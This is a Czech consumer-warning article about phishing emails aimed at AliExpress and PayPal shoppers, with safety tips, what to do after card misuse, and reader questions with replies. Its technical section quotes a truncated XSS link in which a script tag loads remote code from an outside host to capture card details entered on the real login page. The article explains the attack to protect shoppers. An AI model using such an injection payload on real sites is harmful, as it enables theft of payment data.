Kybernetičtí útočníci stále zkouší získávat citlivé údaje uživatelů nakupujících na Aliexpress, a to přes podvodné emaily. Takový email může vypadat jako email officiálních stránek Aliexpress. Může obsahovat přílohu, která se při otevření uvolní na Váš pevný disk škodlivý počítačový program. Když je po otevření virus aktivován, tak jsou z Vašeho počítače zkopírované citlivé údaje. A to včetně e-mailových účtů, čísel kreditních karet, přístupu do PayPal, eBay, Aliexpress, Amazon a dalších eshopu. Tato stažená data jsou pak odeslána podvodníkovi, který nyní může využít pro svůj vlastní užitek.
Toto upozornění neplatí jen pro zahraniční eshopy jakým je Aliexpress, ale i pro ty české a slovenské eshopy, kde běžně každý den nakupujete. Podvodný email Vám může být odeslán s hlavičkou jakéhokoliv odesílatele. Obchod Aliexpress nebo PayPal zde slouží pouze jako příklad.Bezpečnostní tipy:
- Zkontrolujte si odesílatele, který Vám email poslal.
- Vyhněte se otvírání odkazů nebo příloh, které jsou v podezřelém emailu.
- Neotevírejte podezřelé webové stránky, které potřebují zadat Váše přihlašovací údaje.
Tyto tipy neplatí samozřejmě pouze pro emaily od Aliexpress, ale platí jako obecné pravidlo pro bezpečné nakupování na internetu.
Jak Vás můžou okrást?
Odborníci ze zahraniční bezpečnostní firmy CheckPoint zjistili zranitelnost v internetovém obchodu AliExpress, který byl cílem během předvánočních nákupů. Díky tomu mohli od důvěřivých uživatelů velmi přesvědčivě získat potřebné údaje o jejich platebních kartách. Na začátku všeho byl dobrý úmysl řetězce AliExpress, který pobízel své zákazníky k tomu, aby si ve svém profilu trvale uložili údaje o své platební kartě. Spolu s bezpečnostní mezerou ve svém systému však řetězec nevědomě umožnil, aby tyto údaje byly schopni převzít případní útočníci.
Technické vysvětlení: Útočník tedy může rozeslat emailovou zprávu s odkazem (viz níže), který sice směřuje na oficiální stránku Aliexpress, avšak nese si s sebou škodlivý kód, který následně legitimní stránku upraví pro potřeby útočníka. Oběť tedy sice zadá údaje o své kartě na legitimní stránce, avšak i přesto budou údaje odeslány útočníkovi. https://login.aliexpress.com/havana_login_check.ht… type=’text/javascript‘ src=“https://gmailtracker.com/poc.js“. Kód využil XSS zranitelnost serveru AliExpress. E-shop sice má základní ochranu proti XSS, tedy proti spouštění škodlivého kódu z cizích domén, kód z vlastní domény však spouští bez kontroly, čehož využívá tzv. XSS. Útočníkům tedy stačí najít stránku v rámci domény AliExpress.com, která jejich škodlivý kód přenese s sebou, a tedy zvalidní. Aliexpress se již proti konkretnímu napadení řádně zabezpečil.
Obrázkové příklady podvodných emailů
Pozorně se podívejte na obrázky, kterými zkoušeli podvodníci okrást uživatele Aliexpress. Podívejte se z jakých emailových adres byl email poslán.
1. Žádost o ověření vašeho účtu na Aliexpress
2. Výzva k aktualizaci údajů na Vašem účtu Aliexpress
3. Váš účet byl dočasně zablokován a je potřeba ho ověřit.
4. PayPal – Podobné emaily můžete dostat z jakékoliv adresy, ne jen z falešného Aliexpress
5. Ověření účtu na Paypal
Po kliknutí na odkaz vás to přesměruje na falešné stránky PAYPAL (stránky vypadají velice podobně). Zde se budete pokoušet přihlásit a tím pádem podvodníkům odešlete Vaše přihlašovací údaje.
Co dělat když mi někdo zneužije kartu
- Pravidelně si kontrolujte zaúčtované transakce na účtu ke kartě.
- Máte-li podezření, že (by) mohlo dojít ke zneužití Vaší karty nebo údajů z ní, kontaktujte neodkladně non-stop klientskou linku banky či vydavatele platební karty, nahlaste zneužití karty a kartu zablokujte. Blokace je zdarma.
- Zneužití a blokaci lze provést i přímo na pobočce banky či u členské banky karetní asociace v zahraničí (MasterCard, VISA atd.).
- Když budete reklamovat transakci, kterou jste neprovedli, připravte se na to, že budete muset uvést důvody, proč s transakcí nesouhlasíte, popřípadě doložit doklady nebo dokumenty. Z našich zkušenosti jsou tyto transakce vystornovány a peníze vráceny na karetní účet.
- Pokud reklamaci banka zamítne, zkuste uplatnit reklamaci přes Finančního arbitra
Kde jsou rizika, tam se po čase objeví pojišťovny
Pojišťovny v Česku začínají nabízet takzvané pojištění internetových rizik. Konkurence zatím není veliká: v nabídce má samostatně takový produkt ČSOB Pojišťovna a jako připojištění k pojištění domácnosti ho lze sjednat u Axy. Allianz je schopna pojistku zařídit prostřednictvím mnichovské centrály. Další společnosti produkt připravují, novinky v této oblasti tajuplně naznačují například Česká pojišťovna, Uniqa a Slavia.
Časté dotazy lidí, kteří se stali obětmi podvodných emailů.
Otázka: Stale se to opakuje, zneuziti karty… I ja jsem si na zacatku ulozila kartu a rada bych ji smazala… Jenze dostupne navody ukazuji, ze po kliknuti na MY ALIPAY se zobrazi moznost otevrit ucet… Me to ale nejde… Zobrazi se neco jineho. Jen jakoby reklamni stranka Alipay a kdyz odtam jdu na svuj ucet, hodi me to zpet na hlavni stranu Aliexpresu… Nejaka rada? Dekuji
Odpověd: Dobrý den, karty si můžete smazat dle našeho postupu – Jak odstranit kreditni kartu. Pro přístup na stránky použijte tento odkaz na AliPay.
Otázka: Ahoj všem. Tak jsem právě zjistil, že mi nějaký Číňan z účtu vybral 2500kc za nákup,který jsem nikdy neprovedl, tak si dávejte pozor na účty a co vám z něj strhnou. Měl jsem nakoupit a zaplatit v pátek večer kartou a to jsem nemohl, jelikož jsem byl v hospůdce. Už to reklamují u banky. Tak pozor pozor
Odpověd: Dobrý den, cinan vám určitě nevybral 2500 Kč za nákup. Číňan vaše peníze nemá, protože do potvrzení objednávky jsou uložené na Aliexpress. S velkou pravděpodobností jste se stali obětí emailového útoku. Reklamace u Banky by vám peníze měla navrátit.
Otázka: Bacha na phishing. Mě se takhle nabourali na kartu u bankomatu a ani nemuseli vědět PIN. Za dvě hodiny mi přišla SMS, že jako nakupuju něco ze zahraničí a že si mám navýšit limit. Ihned volám do banky, tam mě uklidňují, že to může být nějaká chyba. Pak to přišlo podruhý a potřetí potvrzení nákupu z ciziny, konkrétně z Holandska. Volám podruhý do banky, kde mi bylo řečeno, že to měli utnout při prvním hovoru, tak zablokovali kartu a řekli mi, že se pokoušel někdo ještě o další dva nákupy. Kartu poslali novou a na pobočku jsem šla podat stížnost a sepsat protokol. Peníze vrátili, ale teď mám blbej pocit pokaždý, když jdu vybírat z bankomatu.
Odpověd: Máme podobnou vlastní zkušenost při návštěvě zábavního parku v Orlandu v USA. Kartu jsme z kapsy ani nevytáhli. Načetli nám to čtečkou, když procházeli kolem nás v davu. Zjistili jsme to až za měsíc a vybrali nám 25 000 Kč. Pojištění karty jsme neměli. Vše nám bylo samozřejmě vráceno zpět.
Otázka: Ahoj, také se podělím se svou zkušeností na aliexpressu. Třeba mi i někdo poradíte zda jde ještě něco dělat. Před týdnem mi najednou z ničeho nic začaly chodit SMS z banky s kódem pro zaplacení nákupu na aliexpress.com. Tak jsem si říkal, že je to asi nějaký omyl, protože jsem tam nic momentálně nenakupoval. SMS ale začaly chodit víc a víc a pokaždé jiná částka. Jel jsem tedy z práce domu, sednul k PC a šel na účet. Zjistil jsem že na účtu mám 18 čekajících transakcí aniž bych cokoli odsouhlasil, cokoli si objednal a někam zadal kód. Chtěl jsem se tedy přihlásit na účet aliexpress.com a nedostal jsem se tam. Pokaždé mi to psalo, že účet neexistuje i přes kontrolu přes telefon atd. Uvědomil jsem si, že mi ráno přišel mail, kde bylo napsáno, že pokud nezadám doplňující údaje k účtu aliexpress, tak bude zrušen. Já blbec jsem mail otevřel, zadal klasické údaje jako adresa atd. a vse ukončil. Vypnul PC a hurá do práce. Díky tomuto se mi někdo hecknul do účtu aliexpress, kde opět díky mé blbosti byly uložené údaje z mé kreditní karty aniž bych o tom věděl a dotyčný hacker si začal objednávat co to jde.
Ihned jak jsem to zjistitl, tak jsem volal do banky a kartu zablokoval. Druhý den jsem v bance podal reklamaci, jelikož nechápu proč banka platby pustila, když já jsem žádnou platbu nepotvrdil. Na aliexpressu jsem se pokoušel komunikovat několikrát po chatu s techniky. Pokaždé mi slíbily že se mi ozvou na mail, že mi účet zrušili a zjistili jsme i mail toho dotyčného co mi účet napadl. Ale bohužel reakce žádná. Jeden technik mi napsal jaké mám napsat údaje do mailu a zaslat je na mail: [email protected]. Bohužel se mi ale všechny maily vrátily jako nedoručené. Takže jsem zbytečně přišel o spoustu peněz a nevím jak je dostat zpět. Dávejte si tedy pozor na tyto maily a hlavně ať nemá váš účet na aliexpressu uložené údaje z kreditní karty. Já si toho bohužel nevšiml, že se automaticky uložily.
Odpověd: Ano, jste ukázkový příklad emailového phishingu. Navrácení peněz řešte přímo s bankou nebo pak přes finančního arbitra.
Pokud máte nějaké otázky nebo vlastní zkušenost (kladnou nebo zápornou), napište nám ji prosím do komentáře po tento článek. Děkujeme
Dobrý den,
Stalo se mi něco podobného, ale na stránce Wish. Na internetovém bankovnictví jsem objevila transakci za 4800,-, kterou jsem však nepotvrdila a nic jsem nenakupovala.
Okamžitě jsem vše ohlásila na policii, zablokovala kartu, podala reklamaci v bance a čekám a modlím se, aby mi banka peníze vrátila. Taky jsem změnila heslo k účtu na Wish. Na mám účtu na Wish mám samozřejmě potvrzenou objednávku, která však putuje na adresu v Americe.